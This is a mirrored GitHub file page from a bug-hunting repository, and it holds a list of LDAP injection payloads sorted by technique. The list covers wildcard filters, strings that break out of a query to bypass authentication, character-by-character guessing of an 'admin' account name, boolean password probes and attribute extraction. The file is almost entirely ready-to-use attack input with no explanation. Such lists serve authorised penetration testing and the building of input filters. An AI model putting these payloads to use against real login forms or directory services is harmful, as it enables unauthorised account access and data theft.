mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 19:36:33 +00:00
copilot-swe-agent[bot]
ba72efbc5e
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
40 lines
568 B
Plaintext
40 lines
568 B
Plaintext
# LDAP Injection Payloads
|
|
|
|
# Basic LDAP injection
|
|
*
|
|
*(uid=*)
|
|
*(cn=*)
|
|
*(objectClass=*)
|
|
|
|
# Authentication bypass
|
|
*)(uid=*))(|(uid=*
|
|
*)(|(uid=*))
|
|
*)(cn=admin)(|(cn=*
|
|
admin)(&(uid=*))
|
|
|
|
# Filter bypass
|
|
*)(objectClass=*))(&(objectClass=*
|
|
*)(|(password=*))
|
|
*)(cn=*)(|(cn=*
|
|
|
|
# Blind LDAP injection
|
|
*)(cn=a*
|
|
*)(cn=ad*
|
|
*)(cn=adm*
|
|
*)(cn=admin*
|
|
|
|
# Boolean-based
|
|
(&(uid=admin)(password=*))
|
|
(&(uid=admin)(!(password=wrong)))
|
|
(|(uid=admin)(uid=administrator))
|
|
|
|
# Wildcard usage
|
|
uid=*
|
|
cn=*
|
|
sn=*
|
|
mail=*
|
|
|
|
# Attribute extraction
|
|
*)(objectClass=*))(%26(objectClass=*
|
|
*)(uid=*))(%26(uid=*
|